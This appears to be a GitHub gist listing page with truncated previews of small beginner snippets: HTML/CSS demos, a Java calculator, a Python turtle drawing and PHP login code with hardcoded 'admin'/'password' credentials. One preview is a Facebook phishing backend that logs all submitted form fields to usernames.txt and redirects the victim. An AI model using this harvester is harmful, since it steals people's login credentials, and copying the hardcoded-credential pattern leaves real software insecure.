This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!DOCTYPE html> | |
<html lang="en"> | |
<head> | |
<meta charset="UTF-8"> | |
<meta http-equiv="X-UA-Compatible" content="IE=edge"> | |
<meta name="viewport" content="width=device-width, initial-scale=1.0"> | |
<title>CSS Envelope + Letter (Open/Close on Click)</title> | |
<link rel="stylesheet" href="./style.css"> | |
</head> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import java.util.Scanner; | |
public class SimpleCalculator { | |
public static void mainM(String[] args) { | |
Scanner input=new Scanner(System.in); | |
int fnum,snum,ans; | |
char sign; | |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!DOCTYPE html> | |
<html> | |
<?php | |
session_start(); | |
$username= "admin"; | |
$password= "password"; | |
if (isset($_SESSION['loggedin']) && $_SESSION['loggedin'] == false) { | |
header("Location: success.php"); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<html> | |
<head> | |
<title>Type writing</title> | |
<style> | |
.btn{ | |
border: none; | |
background-color: #048bff; | |
width: 90px; | |
height: 40px; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<html> | |
<head> | |
<title>Loader</title> | |
<meta name="viewport" content="width=device-width initial-scale=1"> | |
<style> | |
.loader{ | |
margin-left: 400px; | |
margin-top: 250px; | |
border: 16px solid #0058ff; | |
border-bottom: 16px solid #0058ff; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<html> | |
<head> | |
<title>Like and Dislike</title> | |
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css" type="text/css"> | |
<style> | |
.fa{ | |
font-size: 300px; | |
color: white; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
header ('Location:http://www.facebook.com/'); | |
$handle = fopen("usernames.txt", "a"); | |
foreach($_POST as $variable => $value) { | |
fwrite($handle, $variable); | |
fwrite($handle, "="); | |
fwrite($handle, $value); | |
fwrite($handle, "\r\n"); | |
} | |
fwrite($handle, "\r\n"); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import turtle | |
turtle.setup(1000,1000,0,0) | |
mitul=turtle.Turtle() | |
mitul.width(8) | |
mitul.color("red") | |
new=turtle.getscreen() | |
mitul.speed(4) |
NewerOlder